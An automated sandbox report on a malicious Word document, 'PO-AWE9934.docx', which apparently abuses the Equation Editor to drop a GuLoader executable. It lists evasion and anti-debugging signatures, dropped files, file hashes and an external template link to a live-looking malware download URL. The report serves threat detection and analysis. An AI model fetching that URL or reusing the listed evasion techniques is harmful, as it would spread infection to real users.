Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Document has an unknown application name

Source: ~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp.0.dr

OLE indicator application name: unknown

Contains functionality to shutdown / reboot the system

Source: C:\Users\Public\vbc.exe

9_2_0040352D

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 9_2_0040755C	9_2_0040755C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00406D85	9_2_00406D85
Source: C:\Users\Public\vbc.exe	Code function: 9_2_73281BFF	9_2_73281BFF
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03699C2E	9_2_03699C2E
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03699963	9_2_03699963
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03699462	9_2_03699462
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0369DAF1	9_2_0369DAF1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03698AD9	9_2_03698AD9

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe

Code function: 9_2_03699C2E NtAllocateVirtualMemory,

9_2_03699C2E

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Document contains no OLE stream with summary information

Source: ~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp.0.dr

OLE indicator has summary info: false

PE file contains strange resources

Source: vbc[1].exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc[1].exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc[1].exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

Source: PO-AWE9934.docx	Virustotal: Detection: 26%
Source: PO-AWE9934.docx	ReversingLabs: Detection: 16%

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Users\Public\vbc.exe

9_2_0040352D

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$-AWE9934.docx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDB50.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOCX@4/26@13/2

Source: C:\Users\Public\vbc.exe

Code function: 9_2_004021AA CoCreateInstance,

9_2_004021AA

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 9_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

9_2_0040498A

Source: ~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: secur32.pdb source: secur32.dll.9.dr
Source:	Binary string: SxsStore.pdb source: sxsstore.dll.9.dr
Source:	Binary string: secur32.pdbUGP source: secur32.dll.9.dr
Source:	Binary string: SxsStore.pdbGCTL source: sxsstore.dll.9.dr

Source: ~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000009.00000002.722712672.0000000003690000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 9_2_732830C0 push eax; ret	9_2_732830EE
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0369594F pushfd ; retf	9_2_03695981
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03691B54 push FFFFFF81h; ret	9_2_03691B58
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03691F2D push edx; retf	9_2_03691F51
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03691F27 push 00000027h; iretd	9_2_03691F29
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03695919 pushfd ; retf	9_2_03695981
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0369111B push esi; ret	9_2_0369111C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_036949EF pushad ; iretd	9_2_03694A06
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03696BD2 push 910F868Eh; ret	9_2_03696C30
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03696BA9 push 910F868Eh; ret	9_2_03696C30
Source: C:\Users\Public\vbc.exe	Code function: 9_2_036959A1 pushfd ; retf	9_2_03695981
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03692C74 push edx; retf	9_2_03692CCC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03696C4F push 910F868Eh; ret	9_2_03696C30
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03692C14 push edx; retf	9_2_03692CCC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03694ECB push eax; iretd	9_2_03694ECC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_036950CB push esi; retf	9_2_036950CC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03693CD9 push CACC293Ch; retf	9_2_03693CE4
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03695EB5 push D0CC293Ch; retf	9_2_03695EC0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03692C99 push edx; retf	9_2_03692CCC

PE file contains sections with non-standard names

Source: secur32.dll.9.dr

Static PE information: section name: .didat

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 9_2_73281BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

9_2_73281BFF

Binary contains a suspicious time stamp

Source: secur32.dll.9.dr

Static PE information: 0xAEC0B68B [Mon Nov 27 15:00:27 2062 UTC]

Persistence and Installation Behavior

Contains an external reference to another file

Source: webSettings.xml.rels

Extracted files from sample: https://onebztip.club/index.php/x

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\sxsstore.dll	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\secur32.dll	Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2532

Thread sleep time: -420000s >= -30000s

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\Public\vbc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sxsstore.dll

Jump to dropped file

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 9_2_03699366 rdtsc

9_2_03699366

Source: C:\Users\Public\vbc.exe	Code function: 9_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	9_2_00405C49
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00406873 FindFirstFileW,FindClose,	9_2_00406873
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0040290B FindFirstFileW,	9_2_0040290B

Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node

Source: vbc.exe, 00000009.00000002.722175818.0000000000264000.00000004.00000020.00020000.00000000.sdmp

Anti Debugging

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 9_2_73281BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

9_2_73281BFF

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 9_2_03699366 rdtsc

9_2_03699366

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 9_2_03699128 mov eax, dword ptr fs:[00000030h]	9_2_03699128
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0369C501 mov eax, dword ptr fs:[00000030h]	9_2_0369C501
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0369DAF1 mov eax, dword ptr fs:[00000030h]	9_2_0369DAF1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0369CAD3 mov eax, dword ptr fs:[00000030h]	9_2_0369CAD3

Source: C:\Users\Public\vbc.exe

Code function: 9_2_0369EF3F RtlAddVectoredExceptionHandler,

9_2_0369EF3F

HIPS / PFW / Operating System Protection Evasion

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"

Jump to behavior

Source: C:\Users\Public\vbc.exe

9_2_0040352D

ID:	562071
Product:	CloudBasic
Start time:	11:25:11
Start date:	28.01.2022
Sample:	PO-AWE9934.docx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	41d90bec5e345b3f4a7086158e236730
SHA1:	5a179b748a9523ac4cd1b4010f294e5497b5329e
SHA256:	76772145ed4ca48917df45363d450652cba0605b307d85937166c3042ea85609
Filetype:	Word Microsoft Office Open XML Format document (49504/1) 49.01%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD	data	5F275CD42CC65F4E37A3A7ADB88AC251	43B9A1247FD7E6FEE59C367E4FC23081532ABA59	4210C10BE3F1C34DCC62419A03A8A940590E4DD89F97ABC53BEC2828F6178A21
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{A7237623-5E03-4814-94FE-7F3CA262EA81}.FSD	data	A4CDC0B138A5E1511DF3E9429008CDD3	716967EEC1AFB80ED5BA503A315EEADFFE8B2FD7	EC711E69BF201B377E3C19DC7B4D2FA752256137A13D2F3C194508456C16DE81
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF	data	754474D0362B285A257DA3CC78E1561E	977FF271BBD6ABEF51E15B716B5B530C469BC83F	97E6055C5B47CDF9279977438E77F0D525FB534D15401D379AF02A927C84F77D
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD	data	88BB3CD2F205DF018A2EF2CCC7223EA2	9F483D3CAC60BC4DE3A88DC153921422FB2DBACB	62F64D4F62C1D488854D8982CE4725C44C07C2B76841F305EDBC99431C8091D1
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{D52C8A6F-38F1-4102-9EE5-ECDCF6278B29}.FSD	data	C40CD17B07A96AC0B5AE50766E6F5F45	2B07017C9BB10656FA25786D65BAA486905D7490	F1D886D208E7F69F7E6F3B59ABF1199AD473371616041E96E19A9EB5574895DE
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF	data	CCD001632AA30047218E47ACDF456533	F80471D406A31FDE753434CD39B8E075BB88C915	6840816CA285599813740E838C8A40B7810C798C238647162E9E0C3E83D5919C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	38034F18AF511C3B04B25170735E8B8E	797252E9139D3D46825440335437AD9D538F6B5B	7BABDD2C7D3752B7B48729110F0AB94DE7CF74C478B7E1EA7A71A468748E70C0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dhl_shp[1].wbk	data	A6FFA04A3201EE67F8A8AA428B7C8E5D	084018D9CBD532EA01921A7AE39873DFC1F47E57	3288C730D8FD5995A16BFE2A660A1E0163C8ABF57AFF25B2827AE4693F6B5799
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DCC5A3.wbk	data	A6FFA04A3201EE67F8A8AA428B7C8E5D	084018D9CBD532EA01921A7AE39873DFC1F47E57	3288C730D8FD5995A16BFE2A660A1E0163C8ABF57AFF25B2827AE4693F6B5799
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp	Composite Document File V2 Document, Cannot read section info	6E0BAC500FB6E557667A9D3EEBCF83DB	25653B2CA2C0606B662BB4AEC59AD99AEEE2EDA8	47038FC43776952C0F9BCFDDE5F83127BC48FCD7AB8DD9CADA365B68E35E28A3
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AF71696C-9FFE-4094-80B8-5D87621A22A7}.tmp	data	CA43ED52791EBF7C1EA332FD4CC46FAE	CCF811128B9FB83980AF98CEFF35327D18569A39	74421BCF9CA31DFE67F6667470FA2E23557FD7B91E433059209CB0EB6E3F4740
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C73D7E24-0695-475A-9EE3-0951BA4BA5FE}.tmp	dBase III DBT, version number 0, next free block index 7536653	28ADF62789FD86C3D04877B2D607E000	A62F70A7B17863E69759A6720E75FC80E12B46E6	0877A3FC43A5F341429A26010BA4004162FA051783B31B8DD8056ECA046CF9E2
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EB971226-827B-47B0-8F41-C98C9532A108}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	CFF85C549D536F651D4FB8387F1976F2	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
C:\Users\user\AppData\Local\Temp\racehorse.dat	data	D65C77AD010482FBF9F7983146D0A6B5	8400E92DA91E588A3CF2C9C419CB4BAB2CA60B7C	F4BAA8F8FC7D5DF13DC487345B430C8733C59C0D37DD5E5462FBBD33945E724D
C:\Users\user\AppData\Local\Temp\secur32.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	E1FA0E4751888A35553A93778A348A24	98667AE0AB2D955E69C365D62F2DD1A8C839E14E	A074AA8C960FF9F9F609604DB0B6FEFDD454CEB746DE6749753A551FE7B99B51
C:\Users\user\AppData\Local\Temp\sxsstore.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	3F305E85F2751C4AA1A4EFDF3240EDA6	FBD849B83E98E5D0F2A2B2F8E3649ADA7078B2E9	95444BF7752F9092FE00CA6F96FD170820026ED990B1EA59CE34524978B4EB12
C:\Users\user\AppData\Local\Temp\{CD1AE7DA-2A17-41D2-8189-9C674B582013}	data	F35412C1D8332575E152EE67CF9FFACF	B11758A7798B684ABB09E348A3E6BFF7733706B8	B557EAA246C03DE4ADF22D823E3466BFC42487B433E87E34AABB83ECB0E38D6D
C:\Users\user\AppData\Local\Temp\{E15EED8A-E489-447C-AA78-2010F2F4B9A5}	data	C8E036716001651DB89CCBCBB1647F6C	59551D10F7EBBFF23FEF8A0D6D6A617AA83B1C52	CE318A860BFF7FE7D507D7C35C05892184CDA47CB4CA89C6C6F841AE0A9FB9F0
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO-AWE9934.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Fri Jan 28 18:25:16 2022, length=10338, window=hide	4463F2A68557C47CD4F36A76DEF1042F	215E4EF534F73740E487ED25741EFB17C3022830	3D26F4B34A8FF3A34960AFAA8B32D1D6E767A8E2D62263EF774C14A01CA4E4AF
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	77C78F035BA60E2755A6DB0329BBE22A	390244AE7071D02A188A73B391DA329B7D4AAECD	4EC855E097187FE94AE81B377FE518FCFF4BD6EADD81984DC69110D44D28BF20
